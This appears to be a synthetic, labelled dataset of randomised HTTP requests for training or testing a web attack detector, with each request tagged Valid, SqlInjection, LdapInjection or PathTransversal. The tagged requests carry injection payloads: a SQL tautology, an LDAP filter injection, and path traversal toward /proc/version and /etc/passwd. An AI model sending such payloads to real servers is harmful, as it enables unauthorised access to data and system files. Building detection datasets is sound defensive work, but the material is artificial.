GET /otneela/eK@2mt6YQ/dcgw2theo7oTm28Qgpoa/ayaO7AA/fo/.cluIPRlinkd.YK2.js?4home7zO5qDgpsU=tzl&xE3io=%5D%5C%3EandlEdrEpsao-eeIhlm&us=490&DaLeebstllio1es=861383520&Zn3i41uaahgtti=nBd2GDwSeYb-&olfirth1ttF=fs&c035rv5rleea0lo=X+rdeletei&NietccmtcalHe=nh9%3De HTTP/1.0
Host: 243.152.155.237
Connection: es5ixa0
Accept: text/xml, image/*;q=0.3
Accept-Charset: iso-8859-1;q=0.3, hz-gb-2312;q=0.3, cp-932;q=0.9, windows-1257
Accept-Encoding: compress;q=0.9, identity, identity;q=0.6
Accept-Language: ki-pa5odSW, cn-tatuoi2;q=0.5, t-edt6oef6, kn-th
Cache-Control: max-age=6
Client-ip: 194.46.12.62
Cookie: aobjeiene=[ebodypseos\sol-  s;a7tc2dzUyabe=lacatiD=pstyleetdautoexec nc[maea;niyirlon4gse=sFwD0;sireiathcS0=nEd9;9nNaus=euop;aelh=eodzoarhOhqT
Cookie2: $Version="953"
Date: Fri, 05 Oct 07 16:20:03 CET
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: hrRir
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Wed, 02 Apr 08 23:54:57 GMT
If-Unmodified-Since: Wed, 09 Jan 08 18:44:38 GMT
If-Match: *
If-None-Match: *
If-Range: "NRMcI.WBGMr@WMFo8oDy"
Max-Forwards: 9
MIME-Version: 4.0
Pragma: if='ahhv'
Proxy-Authorization: 5disca arKvDE=rei2o
Authorization: Basic MmFhYWU6bm1uc3Rta3I=
Range: 4992-36961
Referer: http://www.wtwishj.de/aiptr/tdsiti/ttdheb.jpeg
TE: trailers,deflate
Trailer: If-Range
User-Agent: h8tbkTF http://www.aeashoh.biz
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: FTP/9.7 www.ueOae.js
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 189 59.44.75.168 "mazmEztho0mt0svdfi" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19194
Start - Id: 15156
class: Valid
GET /orh/lY-ZrespeTH9aJI/caoesoaEesu/ylo7cAof2YCap-W8S.jpeg?fhoero1ar4=woptwp-qopts+inode87i+%2Boson+&09%uqbodyZ1rlink2Sx=8759&bodyfP5O.=snnfrom&6e=5818662123&jelvis=aBPQL3IY3LfS&rbQp_=7626450346&ho=a%3Dnojs%2Brcp&hnlewdozvth1po=99&h5urpfroewes=s&o7aExDWDj6sock_streams=1IDxkq8&afaoi=9&rehpalobchejrf=oyeOpgf%3E3jorcpe&RYj7knNpv=jtihn&t5iet=iF3kTnwzyc HTTP/1.1
Host: www.HEsn4lyI2n.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, gzip;q=0.5, gzip, gzip;q=0.2
Accept-Language: 1wane-2ee
Cache-Control: max-stale=389
Client-ip: 86.108.75.63
Cookie: 5OgfIc_IEF5=eLhYQxkwu;0cinrd=nJnEELTyDikt;se=sVDGBCn.9Mm;dh=zFFpot3BdQH;G5l2j@vGL=vY0ZUull4tRh
Cookie2: $Version="929"
Date: Sun, 22 May 05 20:23:26 CET
ETag: "Y9HtYC_l0F1MxxTqCwW"
Expect: 100-continue
From: 7stnsn@lhythtbTtd.it
If-Modified-Since: Tue, 13 Nov 07 20:25:38 UTC
If-Unmodified-Since: Sun, 11 Nov 07 12:46:00 GMT
If-Match: "nHlCTQRm7y-4@uzkVjRz"
If-None-Match: *
If-Range: *
Max-Forwards: 4737
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: Digest nonce
Range: -96,366774-,-767
Referer: /tphs/aoeo/cln7.asp
TE: deflate
Trailer: Host
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 8.2; Ui-3c; rv:4.8.3) Gecko/82097600
UA-CPU: StrongARM
UA-Disp: 1668,172,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1372x650
Via: HTTP/5.0 www.nlesemt.htm, HTTP/4.6 www.jjl7fg.htm
Transfer-Encoding: compress
Upgrade: Yfo7e/1.2, ocsh/0.2, E0p4oi/1.3
Warning: 615 120.85.45.38 "inrt" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 54307917779872
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15156
Start - Id: 36989
class: LdapInjection
GET /raB@H5Sz__eBfh8z-/wbnGw@WOyC/aaS1n6ASZS6BX.t_Jmi/nie/hdet7ebEo7ICx46n/0Nstlahlesn/sXmV5.jpeg?rdn=old&hcE9dlo=8717&CMYLHOyt-d=%29+%28++%7C++++%28displayName%3Dhad*%29++++%28name++%3D++++had*++++%29%28mail%3Dhad*++%29 HTTP/1.0
Host: www.IeN8ius.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 181.30.249.162
Cookie: eagjis=a6lhergsepecyi;ttgSxsmr=06839;eId=32792;ybredrayz=Teaelm0omv
Cookie2: $Version="55"
Date: Thu, 22 Feb 07 15:35:36 GMT
ETag: W/"NxJqMEpv_fMr0aSVD"
Expect: sgE2rcn=uwru3
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Mon, 08 Jan 07 01:33:24 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 6606
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z2ROZGI6ZGdpaQ==
Authorization: Digest nonce
Range: 84-,-422477,1197-5319
Referer: /jltrs/oaofo6w7/Uquetrr/NFdt/sag55ehh.shtml
TE: chunked
Trailer: Via
User-Agent: Mozilla/0.3 (Windows; U; Win98 2.7; 9a-un; rv:5.1.8) Gecko/96846807
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: aEa/0.0 183.241.29.154, 5.1 www.dsjaoa.jpg, FTP/1.4 www.aiypsR.html:4701
Transfer-Encoding: compress
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36989
Start - Id: 36267
class: PathTransversal
POST /Mgnnr1/76Ci/cmeaNs/ernq0leutihfioe/sASnic.png? HTTP/1.0
Content-Length: 94
Content-Language: d
Content-Encoding: deflate
Content-Location: http://www.teoaoe.uk/pxdmtnen/habtah/qnnir.pdf
Content-MD5: b25JcnRqYWVuZHJlZW9hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Feb 08 14:10:55 UTC
Last-Modified: Sat, 10 May 08 07:50:45 UTC
Host: www.ignlt0.biz
Connection: close
Accept: text/*
Accept-Charset: gb2312;q=0.0, euc-cn;q=0.2, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=250
Client-ip: 112.174.108.236
Cookie: pi4tyea=61;6wtHcIpa=njo
Cookie2: $Version="960"
Date: Wed, 10 Dec 08 14:21:46 CET
ETag: W/"oOCb5nZctRT5ek672"
Expect: aPdn
From: h4lVt@earfemtsac.org
If-Modified-Since: Fri, 12 Oct 07 17:24:50 CET
If-Unmodified-Since: Wed, 20 Jan 10 22:09:36 CET
If-Match: "5G9-5kC54TRNrbcJ4de@"
If-None-Match: *
If-Range: Sat, 08 Nov 08 04:54:59 GMT
Max-Forwards: 98
MIME-Version: 7.1
Pragma: e5iYsOrs='y'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://www.sofnsrlt.it/toeel/thid.jsp
TE: trailers,chunked,deflate
Trailer: Via
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 4.9; bD-an; rv:6.3.5) Gecko/25251500
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 9.3 www.ete3T.css, 2.7 34.87.115.152
Transfer-Encoding: identity
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ietehtncD=eteho&%&adteHtuoth=../../../../../../proc/version&s2snlasep4=hctef

End - Id: 36267
Start - Id: 15490
class: Valid
GET /mo4xNcshf/chdytsdoktriipokt/r7E8L0oauo/autoexecHIVW@D@H2Su/eu.jpeg? HTTP/1.0
Host: www.Nmiewhez.ch:95728
Connection: 2pOr7r
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.8, iso-8859-2
Accept-Encoding: *;q=0.2
Accept-Language: can8ts-7es;q=0.5
Cache-Control: uenrb=maiia
Client-ip: 108.57.201.137
Cookie: ieo8ridvap5=&s;sd9h4ehroEndde=lsfi;eoosseeApldtd=a1sZ0=)ntohomet;enraS=caaxe;lak_I.=ol&
Cookie2: $Version="1"
Date: Wed, 18 Jan 06 07:20:35 CET
ETag: "_3v6VtLlDAdHJIDC4Jn"
Expect: 100-continue
From: ense@reotnih1w.cz
If-Modified-Since: Mon, 25 Jun 07 12:10:05 CET
If-Unmodified-Since: Fri, 20 Jan 06 16:09:45 CET
If-Match: "c-orym.0YcurpSyQ"
If-None-Match: *
If-Range: Fri, 20 Mar 09 12:08:50 CET
Max-Forwards: 953
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM bWxyd2FvRUYwYWlwbzNvYWRlcmZUb2VzM2h1dE5MbDdndGRuZWE1cng4aWFvZQ==
Authorization: Basic bXUzdGd0OnNiZWRvZg==
Range: 3694-
Referer: /zOuola/b6msl.exe
TE: gzip
Trailer: Max-Forwards
User-Agent: awDBmI http://www.Hf9Iyieu.st
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1725x7516
Via: HTTP/3.0 201.254.224.172, aip/5.5 www.9idedao.html, 9nteIo/8.5 167.162.247.95
Transfer-Encoding: compress
Upgrade: cwynn/5.0, lsm/0.3
Warning: 718 www.80zvotre.png "la57regea" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 848642
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15490
Start - Id: 13002
class: Valid
GET /4ttaoEfAphjju9s/eU2lz.V7AcO5eGP5/cPl/ugitme0wf.css?eb=np5Jq8BZ&sYYslN=+w&rpr0osaer=81&lihe5tpe6To=+p%26lhttpsovbscriptvp%3B++akvbr&at3e5x=7469220&whlIgsdtQ=6 HTTP/1.0
Host: www.cctenoefvT.fr
Connection: close
Accept: application/*, image/jpeg, video/quicktime;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.1, gzip;q=0.2, identity, deflate, gzip;q=0.9
Accept-Language: e-wlira;q=0.5, akezIth-gicce;q=0.5
Cache-Control: no-store
Client-ip: 179.13.145.65
Cookie: 9vsavra1te3d=e;tT3gsiuesetnarn=i@st_eSk3TB;@D6F1DSperl=0312866
Cookie2: $Version="656"
Date: Sun, 25 May 08 13:43:22 CET
ETag: W/"6egloIt9iaQf9dXJ1"
Expect: Xeaushv
From: lusn@oOluioot.it
If-Modified-Since: Sat, 17 Feb 07 12:30:00 UTC
If-Unmodified-Since: Thu, 15 May 08 11:13:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.0
Pragma: Decexwe=mea
Proxy-Authorization: Digest nonce
Authorization: Digest username="5rFegy"
Range: 777-8861,-671902,43-427
Referer: http://otikpntd.it/dfzhe3id.tiff
TE: chunked;q=0.4,trailers,trailers
Trailer: Date
User-Agent: udov3Sg/8.3.4.8.1
UA-CPU: StrongARM
UA-Disp: 078,7191,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 011x9947
Via: HTTP/9.4 www.uTlrf.jpg, 1.5 13.104.41.234
Transfer-Encoding: deflate
Upgrade: hrA/3.8, tkv/2.1
Warning: 372 255.68.21.83 "wshteTepoSfeNaBeeet" "Sat, 04 Apr 09 24:07:12 UTC"
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 48761623
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13002
Start - Id: 42257
class: SqlInjection
GET /hxrteecdmaeotede.php?i5bnseyeat6ree=raeacruiqrBavF&eio8qr=afa&LdsRlqpsoITdgsr=%2Fni+s%28h&pipmtS3=otsndwg+i3drIs&rsFre=-&E0oCm9-X_7=hftAenhNy7s7&T8Rm-ZmfhttpsK=07&ehht=r%5Deto&gHsscript9K9Fi=12974&eWDXDlo3BcW-=mwl8koaDtdna&soawahl=0867641&2jfv8DNo=OR++++%27tx%27+++++%3D++++%27Sim%27%2B%27ple%27&loHule=150098557 HTTP/1.1
Host: 139.68.216.205:80
Connection: ss9zorn
Accept: */*;q=0.1
Accept-Charset: euc-jp, hz-gb-2312, x-mac-roman
Accept-Encoding: 
Accept-Language: 6-ohtSo4wc, gre-Aea;q=0.8
Cache-Control: no-cache
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Mon, 09 Apr 07 12:11:44 GMT
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Tue, 29 Apr 08 23:18:40 UTC
If-Unmodified-Since: Fri, 11 Feb 05 17:41:06 CET
If-Match: "hJY--ujt5vlPCU2RZ_"
If-None-Match: *
If-Range: Sun, 21 Mar 04 15:36:06 GMT
Max-Forwards: 2
MIME-Version: 9.4
Pragma: ds=si4
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 041331-40746,8485-207,-9
Referer: http://Th5manot.uk/eythwh.jpeg
TE: trailers,gzip,trailers
Trailer: Accept-Language
User-Agent: i0sherhRy (eZqeRA@6; t8oqI0G; bEJYJf69; ePcqNpS-C)
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4325x083
Via: 1.6 66.3.83.70:41454
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 214 www.reeoeeg.jpeg:84615 "cehctR1lusd" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42257
Start - Id: 18076
class: Valid
GET /i4sRIHPr4yEk/ngA/adSieehuDni9Dedlh/mxrolitehnoaB/glaseeeYrAh6ocT5ed/saa3/xfpa5kP4j.jpg?ffinre4eloi6d=%299q+yMr0ag6w HTTP/1.0
Host: www.0aai4elrwe.cz
Connection: disraoi
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.3, identity;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 211.175.152.169
Cookie: eeihadmEnAi=laapeint;bpaasyerbzdt1bs=725;iis= T7 n
Cookie2: $Version="5"
Date: Wed, 20 Aug 08 01:49:14 GMT
ETag: W/"g7r8z-NEbn1enuA@"
Expect: ofxe=mtueeg;ehupn=hvihrc
From: dunw9ir2@r7eer.cz
If-Modified-Since: Mon, 12 Feb 07 03:39:41 UTC
If-Unmodified-Since: Fri, 02 Jun 06 14:58:33 CET
If-Match: "mwzXyWFj0GISoxOdKWs4"
If-None-Match: "sb@4TUnYGdfCbCvdA"
If-Range: *
Max-Forwards: 0803
MIME-Version: 3.6
Pragma: ianuak='ee5jo'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: NTLM RXRhRUlMdGQ0bWVjT2lnYWVzZmQxb284VWxhYW5zc2Uzd2pybWU=
Range: -4851,-556
Referer: /5aoci8/ioEtZm/trak.conf
TE: trailers
Trailer: Cache-Control
User-Agent: r_P0p1N http://www.4fnhbTs.it
UA-CPU: MIPS
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: FTP/8.6 www.ltrore0.html
Transfer-Encoding: compress
Upgrade: pcVooi/8.0, teny6/2.3
Warning: 970 170.135.9.178:60 "ti8hzfgtn" 
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 507009022926065
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18076
Start - Id: 6777
class: Valid
PUT /irTZxB@/c33NwgZzJtGPhh0/hohle8athlhOi5d/peI1twGirldy/jt2r-n16C0OPfT.-Vxx./pasmochadW/tdfGz@Ee2/stdinHvsamJ@mailr8q/PV8connectm1/sInlme4sledvO/ibm8Kt4nU1evH.php? HTTP/1.1
Content-Length: 73
Content-Language: N,aoos2r,se9Ir
Content-Encoding: compress
Content-Location: http://oesct.net/ddtscoed/a8to/ieo6xlGk/i05dI.pdf
Content-MD5: ZWRyaWFMcXZuaDdybzlucA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Oct 05 12:28:13 UTC
Last-Modified: Thu, 02 Apr 09 05:45:44 UTC
Host: 216.30.49.190
Connection: keep-alive
Accept: video/quicktime;q=0.9
Accept-Charset: shift_jis, shift_jis
Accept-Encoding: *;q=0.0
Accept-Language: aty-dmseupI;q=0.2, mnebisn-v, ev5u3-d3;q=0.9
Cache-Control: min-fresh=4939
Client-ip: 208.227.85.150
Cookie: ereuG3a2ndeosHo=i2TX
Cookie2: $Version="75"
Date: Tue, 11 Jan 05 12:42:21 UTC
ETag: "qXmOYNfiyjf3O5R"
Expect: 100-continue
From: oisbr@Wgoiel.fr
If-Modified-Since: Mon, 07 May 07 06:35:09 CET
If-Unmodified-Since: Wed, 08 Jun 05 12:36:01 GMT
If-Match: "RTj3NZyf_DGSzhOef"
If-None-Match: "I-0A722iCfp59poTfV"
If-Range: Mon, 24 Oct 05 03:12:38 UTC
Max-Forwards: 37
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: 2717qy Pe4an=p0l4e
Authorization: Digest nonce
Range: 8-
Referer: http://www.rhhf.st/hfgieruq.php4
TE: chunked;q=0.1,chunked;q=0.6,gzip
Trailer: Range
User-Agent: Mozilla/9.5 (compatible; te4ehey; Open BSD i586; R7a1styth)
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3268x616
Via: 8.9 18.134.7.38:8
Transfer-Encoding: Uer9
Upgrade: wetlti/0.9, ndo/4.0, Ralc/5.4, 4tt/7.6, ogib0/1.3
Warning: 967 196.110.31.176 "steteazmyrenN7eot" "Wed, 15 Nov 06 02:04:00 GMT"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 496114408106938218
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

wusqaillup=wxhaltms0kdhwadro&o5eaidnrsi=st9i5elhabEgmcfd&IFesNAotl=ol= 

End - Id: 6777
Start - Id: 26744
class: Valid
GET /O5.linkjgcLtvar/xiidgito6ipl/rq.TME@4AM8/haiista8ctnen9.dll? HTTP/1.0
Host: www.i6rehe.com:7
Connection: hheq
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=4
Client-ip: 65.249.20.219
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="314"
Date: Wed, 03 Mar 04 21:32:51 GMT
ETag: "Dxp4@Qky07BR_FAN"
Expect: SlicjSti
From: slnt@rItzvIc.net
If-Modified-Since: Sun, 23 Jul 06 05:17:21 GMT
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: "Heyo1FU6kGyG_c77EPLh"
If-None-Match: *
If-Range: "iNqu7.zPA3gG0@P2"
Max-Forwards: 056
MIME-Version: 1.9
Pragma: 6ugsog='nshmsd'
Proxy-Authorization: trel9e 9e8qd=tce47
Authorization: NTLM YXJkZXRuaWhhdGFJdlpsdDZndW53YWJiZGFxc2FlZTlkdDRzZnRvZW5kYQ==
Range: 18782-,79-10,1-29104
Referer: /ohri/edoay.jpeg
TE: chunked;q=0.9,trailers
Trailer: TE
User-Agent: sofhbmt2r/9.7.9.5
UA-CPU: MIPS
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 358x270
Via: 2.1 189.80.107.122
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 690 159.100.10.222 "ttdrx" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26744
Start - Id: 17997
class: Valid
GET /LdropRQM1JxIi/fetboihrt0/thVDjo.rT/n_P3a.pDpwIY.js? HTTP/1.0
Host: www.tbTt.net
Connection: tsehz
Accept: */*
Accept-Charset: iso-8859-2, iso-8859-3;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 75.186.186.29
Cookie: BnuhH=1ashn6ite;@V8c=hanao; secrii;3mformF=9263812233;aog=2909720840;ahdip7=eOw
Cookie2: $Version="312"
Date: Sat, 20 Jun 09 20:32:54 UTC
ETag: W/"kyTw_ggtU6ddKcyHBMOx"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Mon, 01 Oct 07 12:00:57 GMT
If-Unmodified-Since: Fri, 20 Feb 04 17:06:21 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jul 07 06:58:43 UTC
Max-Forwards: 262
MIME-Version: 0.7
Pragma: ErIm2r='afmeagg'
Proxy-Authorization: NTLM d3N0dHNobm1ub1JoZWphaGFlc3djckVubWZldW5zaWc=
Authorization: Digest nonce
Range: -44534,46459-4352,54-118133
Referer: /Tcsioe/Ne2oo/nnc8hYm.nsf
TE: trailers,trailers
Trailer: Range
User-Agent: acnerssti (rFM1lvHqGL)
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: HTTP/2.9 96.31.192.67, 4.7 www.6h7abatt.js:34, 4.1 135.40.65.149
Transfer-Encoding: gzip
Upgrade: oaieq/9.9, Ohs/6.4, yteh4/6.6, vtnwf0/9.1, eeni/8.8
Warning: 232 www.n7dt6nol.jpg "shrpnntmcpavr" "Mon, 02 Apr 07 24:42:36 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 84617847595022
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17997
Start - Id: 6820
class: Valid
POST /wIp/y7DOUf/ewbgddos8t7OEtlgx4ys/HYYWadminh@FGclpHEb/tlIzfY/C.t_C/tGTtD1Y/_N0FGYNRyB/jTQ/wtJlFj0DiT6S/da6.jpeg? HTTP/1.0
Content-Length: 129
Content-Language: eI4oegi,elpSrsat,ras3i
Content-Encoding: deflate
Content-Location: http://emaihhra.gov/rgvo/8Iw7ijxt.bin
Content-MD5: RHJ6dGllb0lpWnRzb2lOcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Jul 06 03:15:59 CET
Last-Modified: Fri, 07 Jan 05 19:36:47 UTC
Host: www.de4oXs0.fr:781
Connection: keep-alive
Accept: application/*;q=0.1, image/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 1psx7ouf-wtd1t3u;q=0.8, ama-hHivapht, i8aiz-s0ncaeA
Cache-Control: 4i=5toe
Client-ip: 117.227.125.202
Cookie: rbt=675537;fPacwysycofyhai=cehttp0
Cookie2: $Version="24"
Date: Fri, 11 Dec 09 03:17:18 CET
ETag: W/"Sey.fUogs3PYC@WoS@9"
Expect: dmxapto
From: n7hf@Nessscta.com
If-Modified-Since: Sun, 11 Oct 09 18:03:55 UTC
If-Unmodified-Since: Mon, 31 Oct 05 16:26:40 CET
If-Match: "d7x7f1P5pjUMjUab"
If-None-Match: *
If-Range: "4esoIeSKz-Wo1clPrO"
Max-Forwards: 74
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ebae5n taesA=caraxl
Authorization: NTLM b29sZGZleWlsb2loaWQyYWVTaGhlYXc4Rm44ZXRtZ2FvRXpk
Range: 360-091927,-501856
Referer: /obRr/7fvh/ahehi/ermr8.cfm
TE: chunked;q=0.4,deflate;q=0.4
Trailer: If-Range
User-Agent: lp9tl (ab6LhZn; t5znj39; pIRFEN5-iO; st62oHXl; h9c-Z1.D)
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 728x570
Via: HTTP/2.4 121.213.192.129
Transfer-Encoding: deflate
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 009 www.ceectt.jpeg "7iorbsEteI" "Sat, 25 Mar 06 04:42:16 GMT"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zBti6kmldhahetb=ulI50B&aRlhYeshl9p=4irrEeacum&xo=3&anmeDt=b5wi&BeEaomuntlnaiO7=9466143&5rmyr0d=d9aonpu&nrsia=0043679&tcet=9231726

End - Id: 6820
Start - Id: 11148
class: Valid
GET /bcosmud/K8j/ultmdtetanuunni7git/1xCinsertI_Rj1k/nkSechomochaH/hF4LiQzg8H09wX9Zhlzr/mgarcdutwUeiirmj/RCqGh/8udcsb3eOd/EbdseYhT/xmlDU/L1jcvgJ.html? HTTP/1.1
Host: www.tikrdr.be
Connection: keep-alive
Accept: audio/basic;q=0.9, text/xml;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: elias-repmN2;q=0.2, ii-tr;q=0.9, auieqriE-9, ieanee-hona;q=0.1, tfr3sEog-pqle
Cache-Control: 7bu='mdo'
Client-ip: 124.3.147.71
Cookie: egltje=tSmssp;4RTgElwfbPtmp=rltrrlyh8otk
Cookie2: $Version="58"
Date: Tue, 24 Jan 06 23:57:25 UTC
ETag: W/"pqa7.Eb.076tCbGL"
Expect: 100-continue
From: nbnonNn@grbrm2hnt.gov
If-Modified-Since: Thu, 17 Dec 09 10:40:42 GMT
If-Unmodified-Since: Thu, 21 Dec 06 02:31:48 UTC
If-Match: *
If-None-Match: "MhIotOsb5YJKR.wG.6"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.7
Pragma: sdNi2aw='1o0bwE6'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: 5-671745,5852-9861
Referer: http://dbebsx6.it/lmssa/koeinz2/esid.nsf
TE: deflate;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (X11; U; Unix 1.9; ah-rt; rv:1.6.2) Gecko/39211558
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: FTP/4.4 www.jeymstf.tiff, no3i/3.2 56.103.29.186, 9.7 17.38.43.208
Transfer-Encoding: Eeklsd; eblvsel=Ch1hu
Upgrade: hgrW/3.1
Warning: 319 57.235.65.0 "jRcg2cbta" "Thu, 02 Apr 09 11:25:24 GMT"
X-Forwarded-For: 207.202.183.212
X-Serial-Number: 98553683859236748
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11148
Start - Id: 46433
class: PathTransversal
GET /bkJt6wrA-yR1X/toadbrmSoxa1adhicoSe/e5ja/yBDauu4XpWcdx/yzM-FpB2n9qOWj/7q/YXyvbscriptunion.html?@cnH=59&DrnunpnCedeOl=%2Fetc%2Fpasswd&hbgshoaaeui=193&3ertilrTeoOcea=E&8jAX=80&atcnioeouohtEse=aJkYlgcK&d3Ss=sreplacee&nttbgw28ldnm=8281352&sradi=2863879&cnItOFQ2Nv=3Hj2j&uaMacnl4oioosjs=rBHNek HTTP/1.0
Host: www.sEOa9ep.org:1908
Connection: close
Accept: video/quicktime, audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: bgrn9Ep-lpn;q=0.9, iamez-Uap5pmi, enfffd-pw;q=0.9, laonun2-es;q=0.0, ien-a
Cache-Control: max-age=39757
Client-ip: 13.160.243.201
Cookie2: $Version="95"
Date: Fri, 15 May 09 23:25:38 GMT
ETag: "NKqtyz9ILmI6TEVmkg"
